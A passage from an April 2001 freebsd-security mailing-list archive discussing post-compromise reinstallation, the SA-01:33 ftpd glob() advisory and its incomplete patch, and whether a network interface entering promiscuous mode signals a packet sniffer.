freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> From: Dag-Erling Smorgrav Date: 19 Apr 2001 12:37:10 +0200 In-Reply-To: <20010419123915.A446@ringworld.oblivion.bg> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Pentchev writes: > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > It's not either/or. The only acceptable solution to this situation is > > a complete reinstall from a trusted source (e.g. original CD set). > ..and during the install, examine your backups A backup is not a trusted source. Never reinstall from backups after a compromise. Restoring user data from backup is acceptable as long as you are certain that none of that data is executable. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 4: 4:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6DC7937B43C for ; Thu, 19 Apr 2001 04:04:28 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 747 invoked by uid 1000); 19 Apr 2001 11:02:52 -0000 Date: Thu, 19 Apr 2001 14:02:52 +0300 From: Peter Pentchev To: Dag-Erling Smorgrav Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010419140252.A454@ringworld.oblivion.bg> Mail-Followup-To: Dag-Erling Smorgrav , "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Thu, Apr 19, 2001 at 12:37:10PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 12:37:10PM +0200, Dag-Erling Smorgrav wrote: > Peter Pentchev writes: > > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > > It's not either/or. The only acceptable solution to this situation is > > > a complete reinstall from a trusted source (e.g. original CD set). > > ..and during the install, examine your backups > > A backup is not a trusted source. Never reinstall from backups after > a compromise. Restoring user data from backup is acceptable as long > as you are certain that none of that data is executable. That's exactly what I said, wasn't it? :) Especially in my second message.. G'luck, Peter -- Thit sentence is not self-referential because "thit" is not a word. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 4:42:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from liberty.bulinfo.net (liberty.bulinfo.net [212.72.195.7]) by hub.freebsd.org (Postfix) with SMTP id 5393C37B422 for ; Thu, 19 Apr 2001 04:42:13 -0700 (PDT) (envelope-from krassi@bulinfo.net) Received: (qmail 16691 invoked from network); 18 Apr 2001 07:15:28 -0000 Received: from pythia.bulinfo.net (HELO bulinfo.net) (212.72.195.5) by liberty.bulinfo.net with SMTP; 18 Apr 2001 07:15:28 -0000 Message-ID: <3ADD3F02.D54F692D@bulinfo.net> Date: Wed, 18 Apr 2001 10:15:14 +0300 From: Krassimir Slavchev X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.13 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob References: <200104171909.f3HJ9gH14235@freefall.freebsd.org> Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms577BBB9BCDC5A985EA8A97AF" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a cryptographically signed message in MIME format. --------------ms577BBB9BCDC5A985EA8A97AF Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Hmmm, any ideas? /usr/src# patch -p < /tmp/glob.4.x.patch Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: lib/libc/gen/glob.c |=================================================================== |RCS file: /home/ncvs/src/lib/libc/gen/glob.c,v |--- lib/libc/gen/glob.c 1998/02/20 07:54:56 1.11 |+++ lib/libc/gen/glob.c 2001/04/07 21:00:20 -------------------------- Patching file lib/libc/gen/glob.c using Plan A... Hunk #1 succeeded at 129. Hunk #2 succeeded at 137. Hunk #3 succeeded at 158. Hunk #4 succeeded at 168. Hunk #5 succeeded at 197. Hunk #6 succeeded at 207. Hunk #7 succeeded at 233. Hunk #8 succeeded at 274. Hunk #9 succeeded at 321. Hunk #10 succeeded at 415. Hunk #11 succeeded at 480. Hunk #12 succeeded at 493. Hunk #13 succeeded at 508. Hunk #14 succeeded at 528. Hunk #15 succeeded at 552. Hunk #16 succeeded at 567. Hunk #17 succeeded at 606. Hunk #18 succeeded at 636. Hunk #19 succeeded at 674. Hunk #20 succeeded at 710. Hunk #21 succeeded at 791. Hunk #22 succeeded at 804. Hunk #23 succeeded at 823. Hunk #24 succeeded at 840. Hunk #25 succeeded at 860. Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: libexec/ftpd/popen.c |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/popen.c,v |--- libexec/ftpd/popen.c 2000/09/20 09:57:58 1.18.2.1 |+++ libexec/ftpd/popen.c 2001/04/07 21:08:09 -------------------------- Patching file libexec/ftpd/popen.c using Plan A... Hunk #1 succeeded at 107. Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/ftpd.c,v |--- libexec/ftpd/ftpd.c 2001/03/11 13:20:44 1.73 |+++ libexec/ftpd/ftpd.c 2001/03/19 19:11:00 -------------------------- Patching file libexec/ftpd/ftpd.c using Plan A... Hunk #1 succeeded at 189. Hunk #2 succeeded at 2658 (offset 30 lines). Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |=================================================================== |RCS file: /home/ncvs/src/libexec/ftpd/ftpcmd.y,v |--- libexec/ftpd/ftpcmd.y 2001/04/16 22:20:26 1.23 |+++ libexec/ftpd/ftpcmd.y 2001/04/17 03:03:45 -------------------------- Patching file libexec/ftpd/ftpcmd.y using Plan A... Hunk #1 succeeded at 137 (offset -1 lines). Hunk #2 succeeded at 471 (offset -4 lines). Hunk #3 succeeded at 928 (offset -13 lines). Hunk #4 succeeded at 1037 (offset -4 lines). done cd /usr/src/lib/libc make all cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 Stop in /usr/src/lib/libc. FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-01:33 Security Advisory > FreeBSD, Inc. > > Topic: globbing vulnerability in ftpd > > Category: core > Module: ftpd/libc > Announced: 2001-04-17 > Credits: John McDonald and Anthony Osborne, COVERT Labs > Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), > FreeBSD 3.5-STABLE and 4.3-RC prior to the > correction date. > Corrected: 2001-04-17 (FreeBSD 4.3-RC) > 2001-04-17 (FreeBSD 3.5-STABLE) > Vendor status: Corrected > FreeBSD only: NO > > I. Background > > Numerous FTP daemons, including the daemon distributed with FreeBSD, > use server-side globbing to expand pathnames via user input. This > globbing is performed by FreeBSD's glob() implementation in libc. > > II. Problem Description > > The glob() function contains potential buffer overflows that may be > exploitable through the FTP daemon. If a directory with a name of > a certain length is present, a remote user specifying a pathname > using globbing characters may cause arbitrary code to be executed > on the FTP server as user running ftpd, usually root. > > Additionally, when given a path containing numerous globbing > characters, the glob() functions may consume significant system > resources when expanding the path. This can be controlled by > setting user limits via /etc/login.conf and setting limits on > globbing expansion. > > All versions of FreeBSD prior to the correction date, including > FreeBSD 3.5.1 and 4.2 contain this problem. The base system that > will ship with FreeBSD 4.3 does not contain this problem since it > was corrected before the release. > > III. Impact > > Remote users may be able to execute arbitrary code on the FTP server > as the user running ftpd, usually root. > > The FTP daemon supplied with FreeBSD is enabled by default to allow > access to authorized local users and not anonymous users, thus > limiting the impact to authorized local users. > > IV. Workaround > > If the FTP daemon is executed from inetd, disable the FTP daemon by > commenting out the ftp line in /etc/inetd.conf, then reload the > inetd configuration by executing the following command as root: > > # killall -HUP inetd > > V. Solution > > One of the following: > > 1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction > date. > > 2) Download the patch and detached PGP signature from the following > location: > > The following patch applies to FreeBSD 4.x: > > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc > > The following patch applies to FreeBSD 3.x: > > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc > > Verify the detached signature using your PGP utility. > > Issue the following commands as root: > > # cd /usr/src > # patch -p < /path/to/patch > # cd /usr/src/lib/libc > # make all install > # cd /usr/src/libexec/ftpd > # make all install > > If the FTP daemon is running standalone, it will have to be manually > stopped and restarted. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iQCVAwUBOtyT/VUuHi5z0oilAQGiIAP8CJ6Hsp52DuBQhQnA4xBl23kTCtCUKdPf > zRP5yg5B9w+j+6Q6+k2P1B9lv5JcdvmS8+fzfrWUpUAogqkbL5f0njS7fnA68a5H > oiGJgWqLQiMQiszeOOpgqvd1fNRCcCX+SgYewIfP93Cvam+GG+TvZQziV2zcne3O > tjBG/FVzXkg= > =P1j0 > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Krassimir Slavchev Bulinfo Ltd. krassi@bulinfo.net (+359-2)963-3652 http://www.bulinfo.net (+359-2)963-3764 --------------ms577BBB9BCDC5A985EA8A97AF Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIH7AYJKoZIhvcNAQcCoIIH3TCCB9kCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC Bb0wggKhMIICCqADAgECAgMCdTowDQYJKoZIhvcNAQEEBQAwgZQxCzAJBgNVBAYTAlpBMRUw EwYDVQQIEwxXZXN0ZXJuIENhcGUxFDASBgNVBAcTC0R1cmJhbnZpbGxlMQ8wDQYDVQQKEwZU aGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25h bCBGcmVlbWFpbCBSU0EgMTk5OS45LjE2MB4XDTAwMDQxOTEwMzAzN1oXDTAxMDQxOTEwMzAz N1owRDEfMB0GA1UEAxMWVGhhd3RlIEZyZWVtYWlsIE1lbWJlcjEhMB8GCSqGSIb3DQEJARYS a3Jhc3NpQGJ1bGluZm8ubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAIbgn84q8 UBjjtrZ04/Mo4o8WeALj1B7DzOAD+ykhAi0evRBwXNqhZ7oS3zjYDibfHJaEu5XNbeYLu7eQ VwysyzZxHT/GT3VJjO/KsTQc/eWz687v+8VUPrtiudAGBg+B31fXtoYPVF1GA38YwrCPndTL wTnqpKhTrOVTJ9HtnwIDAQABo1AwTjAdBgNVHREEFjAUgRJrcmFzc2lAYnVsaW5mby5uZXQw DAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBSIq/Fgg2ZV9ORYx0YdwGG9I9fDjDANBgkqhkiG 9w0BAQQFAAOBgQBmWTQ4bEjN+WOEhKjJkCpBe87AXZjnfCaOVf1tCIZZPQInnUloyTwTDlll u2eBc9R4++ZgfQksENPbNx2hNbf2I8sNiEENhtVSHvsiJxebB1QEVbehoYMTP2M3fWIJMuF7 H+cDLofptD095Xa+XpocifT/VfcneTr9ph5X80KGSzCCAxQwggJ9oAMCAQICAQswDQYJKoZI hvcNAQEEBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNV BAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0Nl cnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25h bCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3Rl LmNvbTAeFw05OTA5MTYxNDAxNDBaFw0wMTA5MTUxNDAxNDBaMIGUMQswCQYDVQQGEwJaQTEV MBMGA1UECBMMV2VzdGVybiBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEPMA0GA1UEChMG VGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29u YWwgRnJlZW1haWwgUlNBIDE5OTkuOS4xNjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA s2lal9TQFgt6tcVd6SGcI3LNEkxL937Px/vKciT0QlKsV5Xje2F6F4Tn/XI5OJS06u1lp5IG Xr3gZfYZu5R5dkw+uWhwdYQc9BF0ALwFLE8JAxcxzPRB1HLGpl3iiESwiy7ETfHw1oU+bPOV lHiRfkDpnNGNFVeOwnPlMN5G9U8CAwEAAaM3MDUwEgYDVR0TAQH/BAgwBgEB/wIBADAfBgNV HSMEGDAWgBRyScJzNMZV9At2coF+d/SH58ayDjANBgkqhkiG9w0BAQQFAAOBgQBrxlnpMfrp tuyxA9jfcnL+kWBI6sZV3XvwZ47GYXDnbcKlN9idtxcoVgWL3Vx1b8aRkMZsZnET0BB8a5Fv huAhNi3B1+qyCa3PLW3Gg1Kb+7v+nIed/LfpdJLkXJeu/H6syg1vcnpnLGtz9Yb5nfUAbvQd B86dnoJjKe+TCX5V3jGCAfcwggHzAgEBMIGcMIGUMQswCQYDVQQGEwJaQTEVMBMGA1UECBMM V2VzdGVybiBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEPMA0GA1UEChMGVGhhd3RlMR0w GwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1h aWwgUlNBIDE5OTkuOS4xNgIDAnU6MAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqG SIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMDEwNDE4MDcxNTE1WjAjBgkqhkiG9w0BCQQxFgQU Qg1A9d7up+g81DkWY3SC1RBx34IwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggq hkiG9w0DAgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJ KoZIhvcNAQEBBQAEgYAHSvgTrcIF3gw38MOaGnr/tT1vk3J07QxFERxDqLNvPTB5zAORFKWP YeCmn2i+TROHHnts8c7QUZ8RaFuJMNWLAGN6osNju6B5v8vvJELxGPMx8lKnYRhprHY7548a wc7GZuP/8Ucdr+nSQffQgfcSndcFy99yVS/qq/qPp3nx+w== --------------ms577BBB9BCDC5A985EA8A97AF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 4:46:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 34ABA37B43C for ; Thu, 19 Apr 2001 04:46:15 -0700 (PDT) (envelope-from tatibana@splbp2.netlab.nec.co.jp) Received: from mailgate4.nec.co.jp ([10.7.69.195]) by TYO201.gate.nec.co.jp (8.9.3/3.7W01041220) with ESMTP id UAA20847 for ; Thu, 19 Apr 2001 20:46:05 +0900 (JST) Received: from mailsv.nec.co.jp (mailgate51.nec.co.jp [10.7.69.190]) by mailgate4.nec.co.jp (8.9.3/3.7W-MAILGATE-NEC) with ESMTP id UAA09399 for ; Thu, 19 Apr 2001 20:46:02 +0900 (JST) Received: from mgw1.netlab.nec.co.jp (mgw1.netlab.nec.co.jp [133.201.4.10]) by mailsv.nec.co.jp (8.9.3/3.7W-MAILSV-NEC) with ESMTP id UAA18629 for ; Thu, 19 Apr 2001 20:46:00 +0900 (JST) Received: from mail.netlab.nec.co.jp (mail.netlab.nec.co.jp [172.16.3.22]) by mgw1.netlab.nec.co.jp (8.9.3/3.7W-MGW1_NETLAB) with ESMTP id UAA07507 for ; Thu, 19 Apr 2001 20:46:00 +0900 (JST) Received: from splbp2.netlab.nec.co.jp (splbp2.netlab.nec.co.jp [172.16.20.22]) by mail.netlab.nec.co.jp (8.9.3/3.7W-MAIL.NETLAB) with ESMTP id UAA07578 for ; Thu, 19 Apr 2001 20:45:59 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by splbp2.netlab.nec.co.jp (8.9.0/3.7W00063017) with ESMTP id UAA12275 for ; Thu, 19 Apr 2001 20:45:56 +0900 (JST) To: security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) From: Katsuichi Tachibana X-Mailer: Mew version 1.94.2 on Emacs 20.7 / Mule 4.0 (HANANOEN) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010419204555Q.tatibana@splbp2.netlab.nec.co.jp> Date: Thu, 19 Apr 2001 20:45:55 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 17 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Fernando Schapachnik > > > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? > > > > > > > The advisory patch is missing the glob.h patch along with the > > instruction to copy the resulting glob.h to /usr/include. > > > > Quick fix is to either get the diff or entire file from > > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, > > copy the resulting file to /usr/include and build. > > Obviously, it worked. Thanks! So, I wonder why the Security Officers don't update the SA-01:33/glob.{3,4}.x.patch... - tatibana To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 5:20:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4EA5F37B424 for ; Thu, 19 Apr 2001 05:20:13 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1213 invoked by uid 1000); 19 Apr 2001 12:18:38 -0000 Date: Thu, 19 Apr 2001 15:18:38 +0300 From: Peter Pentchev To: Krassimir Slavchev Cc: freebsd-security@FreeBSD.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob Message-ID: <20010419151838.B1067@ringworld.oblivion.bg> Mail-Followup-To: Krassimir Slavchev , freebsd-security@FreeBSD.org References: <200104171909.f3HJ9gH14235@freefall.freebsd.org> <3ADD3F02.D54F692D@bulinfo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADD3F02.D54F692D@bulinfo.net>; from krassi@bulinfo.net on Wed, Apr 18, 2001 at 10:15:14AM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 18, 2001 at 10:15:14AM +0300, Krassimir Slavchev wrote: > Hmmm, any ideas? [snip] > > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in > this function) Yes, this is a known problem; the advisory inadvertently went out with part of the patch omitted. The advisory shall be reissued, and in the meantime, you can get the rest of the patch from: http://people.FreeBSD.org/~roam/misc/glob.h.diff G'luck, Peter -- If this sentence didn't exist, somebody would have invented it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 5:46:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 5CCA137B424; Thu, 19 Apr 2001 05:46:44 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id WAA14999; Thu, 19 Apr 2001 22:46:20 +1000 (EST) From: Darren Reed Message-Id: <200104191246.WAA14999@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: geniusj@bluenugget.net (Jason DiCioccio) Date: Thu, 19 Apr 2001 22:46:19 +1000 (Australia/ACT) Cc: avalon@coombs.anu.edu.au (Darren Reed), bright@wintelcom.net (Alfred Perlstein), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <004201c0c783$7fe71df0$4904a8c0@epylon.lan> from "Jason DiCioccio" at Apr 17, 2001 02:15:15 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jason DiCioccio, sie said: > > From: "Darren Reed" > Subject: Re: non-random IP IDs > > > > How long has your box been up ? How many changes to the system config > > have been made since then ? If you're not there, and it reboots, will > > it come up 100% functional ? Do your computers need some amount of > > preventative maintenance like internal cleaning to deal with dust build > > up, etc ? > > I don't know very many if any people that take their machines off the rack > just to clean dust out of the case. > > > How many times do unscheduled reboots result in hardware not > > spinning back up and at an inconevient time ? > > This would happen regardless of when/if you rebooted it. If you plan for these events (usually outside business hours) then it is generally less painful to deal with them. [...] > > None of my personal boxes have uptimes that ever exceed 6 months, even > my > > servers, but I have complete confidence in them rebooting and services > being > > restarted (modulo file system damage from an unclean shutdown). > > softupdates should take care of this, and as far as HD trouble, if you're > system is really that important then mirror your disks. Really ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:11: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id 6C9DA37B423 for ; Thu, 19 Apr 2001 06:11:03 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: promiscuous mode To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Thu, 19 Apr 2001 08:10:45 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 04/19/2001 08:01:22 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode on the xl0 interface. What would cause this ? Is it a sign of a potential problem ? George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:17: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 8730937B423 for ; Thu, 19 Apr 2001 06:16:55 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1911 invoked by uid 1000); 19 Apr 2001 13:15:03 -0000 Date: Thu, 19 Apr 2001 16:15:03 +0300 From: Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: promiscuous mode Message-ID: <20010419161503.A1527@ringworld.oblivion.bg> Mail-Followup-To: George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:10:45AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 08:10:45AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode > on the xl0 interface. What would cause this ? Is it a sign of a potential > problem ? 'Promiscuous mode' means that the kernel starts processing - and passing to userland programs - ethernet frames that are not targeted to this machine only. This means somebody (usu. root ;) is running a packet capture program - either tcpdump, or some traffic analysis utility, or - if none of the above - possibly a packet sniffer. In the last case, you should be alarmed. If you are not running tcpdump or some traffic analysis program, or if there are times that you are not running those, but the interface still goes into or out of promiscuous mode, then yes, this is a sign of a potential intrusion. G'luck, Peter -- I am the thought you are now thinking. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:19: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 0E35B37B42C for ; Thu, 19 Apr 2001 06:19:03 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f3JDGhb03089; Thu, 19 Apr 2001 06:16:43 -0700 (PDT) Date: Thu, 19 Apr 2001 06:16:43 -0700 From: Alfred Perlstein To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: promiscuous mode Message-ID: <20010419061643.I976@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:10:45AM -0500 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * George.Giles@mcmail.vanderbilt.edu [010419 06:11] wrote: > I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode > on the xl0 interface. What would cause this ? Is it a sign of a potential > problem ? If you're the admin and no one else should be running the network interface in this mode it's a sign of a compromised of security, mainly that your box may be compromised. Just make sure you're not seeing this becasue of things that need promiscuous mode like dhcpd and various network monitoring tools such as tcpdump. -- -Alfred Perlstein - [alfred@freebsd.org] Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:53:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id 803F437B422 for ; Thu, 19 Apr 2001 06:53:55 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: more on promiscuity To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Thu, 19 Apr 2001 08:52:50 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 04/19/2001 08:44:14 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ntop, I assume, will enable ? How do I disable once it is enabled ? George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:55:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 0D8DE37B423 for ; Thu, 19 Apr 2001 06:55:13 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id PAA11924; Thu, 19 Apr 2001 15:55:11 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 